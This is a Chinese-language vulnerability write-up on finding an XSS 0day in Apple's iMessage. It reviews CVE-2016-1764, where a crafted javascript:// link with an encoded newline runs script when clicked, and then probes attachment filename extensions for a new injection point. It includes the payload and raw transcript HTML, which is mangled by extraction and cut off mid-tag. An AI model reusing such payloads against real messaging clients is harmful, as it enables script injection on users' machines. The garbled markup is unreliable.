从老漏洞到新漏洞 – iMessage 0day(CVE-2016-1843) 挖掘实录

prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)compact">s:AE1ABCF1-2397-4F20-A71F-D71FFE8042F5" contiguous="no" role="heading" aria-level="1" item-type="status" receipt-fade="in">YES" id="receipt-delivered-s:ae1abcf1-2397-4f20-a71f-d71ffe8042f5">receipt-container">receipt-item">已送达p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="text" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">p:0/43545678-5DB7-4B35-8B81-xxxxxxxxxxxx" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">img" aria-label="黑哥">今天 23:24:51" aria-label="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)">
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)compact">/date>/message>spacer>/spacer>/chatitem>
那么关键的触发点:
a href="javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)" title="javascript://a/research?
prompt(1,document.head.innerHTML)">javascript://a/research?%0d%0aprompt(1,document.head.innerHTML)
javascript 直接进入 a 标签里的 href，导致点击执行。新版本的修复方案是直接不解析 javascript:// 。
0x03 从老漏洞 (CVE-2016-1764) 到 0day
XSS的漏洞本质是你注入的代码最终被解析执行了，既然我们看到了document.head.innerHTML 的情况，那么有没有其他注入代码的机会呢？首先我测试的肯定是还是那个点，尝试用 " 及  去闭合，可惜都被过滤了，这个点不行我们可以看看其他存在输入的点，于是我尝试发个附件看看解析情况，部分代码如下：
chatitem id="p:0/FE98E898-0385-41E6-933F-8E87DB10AA7E" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment" group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">message guid="p:0/
FE98E898-0385-41E6-933F-8E87DB10AA7E" typing-indicator="no" sent="no" from-me="no" from-system="no" from="D8FAE154-6C88-4FB6-9D2D-0C234BEA8E99" emote="no" played="no" auto-reply="no" group-first-message="yes" group-last-message="yes">buddyicon role="img" aria-label="黑哥">div>/div>/
buddyicon>messagetext>messagebody title="今天 23:34:41" file-transfer-element="yes" aria-label="文件传输: tttt.html">messagetextcontainer text-
direction="ltr">transfer class="transfer" id="45B8E6BD-9826-47E2-B910-
D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F">transfer-atom draggable="true" aria-label="tttt.html" id="45B8E6BD-9826-47E2-B910-
D584CE461E5F" guid="45B8E6BD-9826-47E2-B910-D584CE461E5F"> img class="transfer-icon" extension="html" aria-label="文件扩展名: html" style="content: -webkit-
image-set(url(transcript-resource://iconpreview/html/16) 1x, url(transcript-resource://iconpreview/html-2x/16) 2x);">span class="transfer-text" color-
important="no">tttt/span>/transfer-atom>div class="transfer-button-container"> img class="transfer-button-reveal" aria-label="显示"
id="filetransfer-button-45B8E6BD-9826-47E2-B910-D584CE461E5F" role="button">/div>/transfer>/messagetextcontainer>/messagebody>message-overlay>
/message-overlay>/messagetext>date class="compact">/date>/message>spacer>/spacer>/chatitem>
发了个 tttt.html 的附件，这个附件的文件名出现在代码里，或许有控制的机会。多长测试后发现过滤也比较严格，不过最终还是发现一个潜在的点，也就是文件名的扩展名部分：
chatitem id="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" contiguous="no" chatitem-message="yes" role="presentation" display-type="balloon" item-type="attachment"
group-first-message-ignore-timestamps="yes" group-last-message-ignore-timestamps="yes">message guid="p:0/D4591950-20AD-44F8-80A1-E65911DCBA22" typing-indicator="no" sent="no" from-me="no" from-system="no" from="93D2D530-0E94-4CEB-A41E-2F21DE32715D" emote="no" played="no"